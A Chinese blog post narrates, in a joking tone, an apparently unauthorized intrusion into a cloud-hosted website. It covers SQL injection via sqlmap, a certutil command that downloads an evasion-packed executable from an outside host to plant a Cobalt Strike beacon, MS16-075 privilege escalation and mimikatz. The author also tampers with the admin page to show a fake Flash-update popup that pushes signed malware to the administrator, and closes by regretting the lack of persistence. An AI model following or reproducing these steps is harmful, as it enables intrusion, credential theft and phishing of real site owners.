记一次渗透行动

gclome

原文链接：记一次渗透行动

朋友们好啊，我是乱日一通————毅种循环。


几天前做的一个目标，现在已经没有价值了，把其中的过程做个记录。

朋友其实发了好几天给我了，因为忙着打2077，只能回复说
​
眼看着编不下去了，决定抽一天特地来看这个站。


​
信息收集


信息收集就那么一回事，看子域，看资产，推荐使用FOFA进行收集（好心人们谁给我嫖一个高级会员？）中途的艰辛就不说了，略。因为现在打点进去的服务都给整关了，现在截图截不到了。

​

打 点


我说我们这个信息收集，这只是渗透的基础，信息收集是讲方法的，谷歌百度git开源情报收集缺一不可。渗透的流程，我们都是要从最基础开始讲起，到全流程都学习…哈！

诶…我一说完他啪就演示起来了，很快啊！

然后上来就是一个登录框，吭，一边截包一边分析，感觉有SQL注入了，我全防出去了！

进入的点就是子域上的一个登录点，整了个很丑的框（目测感觉有，希望大火不要和我学习养成目测漏洞的习惯），拿sqlmap跑了一下。

​

大概就是这样子的，运气还不错，用的sqlserver，而且是DBA权限。

1. [19:24:36] [INFO] the back-end DBMS is Microsoft SQL Server
   
2. web server operating system: Windows 2008 R2 or 7
   
3. web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
   
4. back-end DBMS: Microsoft SQL Server 2014
   
5. [19:24:36] [INFO] testing if current user is DBA
   
6. current user is DBA: True

复制代码

DBA了就不用讲武德了，能执行os-shell就最好，在我开启os-shell之后，准备直接上个CS的马，结果意外发生了，应该是杀毒把powershell拦截了。


​

好，可以。

​
然后我就用了一种比较麻烦的方法，先把免杀马传上去再执行，用的是certutil方法。

1. certutil.exe -urlcache -split -f http://1.1.1.1/1.exe  C:\Users\Public\1.exe

复制代码

然后：

1. command standard output:
   
2. ---
   
3. ****  联机  ****
   
4.   000000  ...
   
5.   047a7d
   
6. CertUtil: -URLCache 失败: 0x80070005 (WIN32: 5)
   
7. CertUtil: 拒绝访问。

复制代码

​


好好好，你说什么就是什么。换个目录执行，换成了C/windwos/temp。

1. command standard output:
   
2. ---
   
3. ****  联机  ****
   
4.   000000  ...
   
5.   047a7d
   
6. CertUtil: -URLCache 命令成功完成。
   
7. ---

复制代码

​


然后就上线了我的CS。

后渗透


已知目标2008：
​

阿里云的服务器，安装67个补丁

修补程序: 安装了 67 个修补程序。

1. [01]: KB981391
   
2. [02]: KB981392
   
3. [03]: KB977236
   
4. [04]: KB981111
   
5. [05]: KB977238
   
6. [06]: KB2849697
   
7. [07]: KB2849696
   
8. [08]: KB2841134
   
9. [09]: KB2841134
   
10. [10]: KB977239
    
11. [11]: KB2670838
    
12. [12]: KB2830477
    
13. [13]: KB2592687
    
14. [14]: KB3191566
    
15. [15]: KB981390
    
16. [16]: KB2386667
    
17. [17]: KB2545698
    
18. [18]: KB2547666
    
19. [19]: KB2574819
    
20. [20]: KB2603229
    
21. [21]: KB2639308
    
22. [22]: KB2667402
    
23. [23]: KB2685811
    
24. [24]: KB2685813
    
25. [25]: KB2698365
    
26. [26]: KB2729094
    
27. [27]: KB2732059
    
28. [28]: KB2750841
    
29. [29]: KB2761217
    
30. [30]: KB2809215
    
31. [31]: KB2834140
    
32. [32]: KB2862330
    
33. [33]: KB2894844
    
34. [34]: KB2900986
    
35. [35]: KB2919469
    
36. [36]: KB2923545
    
37. [37]: KB2970228
    
38. [38]: KB2984972
    
39. [39]: KB3004375
    
40. [40]: KB3006137
    
41. [41]: KB3020369
    
42. [42]: KB3020388
    
43. [43]: KB3046269
    
44. [44]: KB3054205
    
45. [45]: KB3059317
    
46. [46]: KB3068708
    
47. [47]: KB3075226
    
48. [48]: KB3080149
    
49. [49]: KB3102429
    
50. [50]: KB3118401
    
51. [51]: KB3125574
    
52. [52]: KB3138612
    
53. [53]: KB3140245
    
54. [54]: KB3156016
    
55. [55]: KB3156019
    
56. [56]: KB3159398
    
57. [57]: KB3161949
    
58. [58]: KB3161958
    
59. [59]: KB3172605
    
60. [60]: KB3177467
    
61. [61]: KB3179573
    
62. [62]: KB3181988
    
63. [63]: KB3210131
    
64. [64]: KB4019990
    
65. [65]: KB4040980
    
66. [66]: KB976902
    
67. [67]: KB4038777

复制代码

用烂土豆 MS16-075提权就行了，一把梭感觉美滋滋。

​
还是个8G内存的服务器，不存在域环境。
看一下用户，好决定后面怎么行动。
​


存在三个用户，其中一个IIS Administrator guest。mimikatz没抓到管理员明文，密文也解不开。

看了一下亲爱的管理员登录时间，登录日志全是匿名登录，这直接艾斯比....
​​
不行我得走，万一反过来把我日了。

看一下文件进程：
​
​

整的挺好，还有个迅雷。查看了一下文件的打开路径，结果没有。
​
​

然后呢，本来想钓管理员PC的，费劲心思在改了他后台页面的源码做了弹窗提示flash版本过低，我甚至连免杀马都准备好了，为了逼真还弄了个假签名。


​
​

然后嘛，记不清自己干了什么跌卵操作一时心急应该是触发了阿里云的异常报警，判断管理员把web服务给关了，自启服务也没做，权限就这样丢了，只能期待管理员会点击我的文件了。

自然是传统功夫以点到为止，因为这时间，按传统功夫的点到为止同学们已经心服口服了。如果这这一套打完，那自然是很无敌啊。

​

反 思


我应该早点固定权限的，阿里云异常登录就报警 连3389我都没进就给整没了。

再怎么整个注册表添加启动项啊。

我劝！你们这些年轻人耗子尾汁，好好学习，以后不要再犯我这样的聪明，小聪明，啊，学习要讲沉心静气，要讲态度，不要搞骚操作。

啊，谢谢同学们！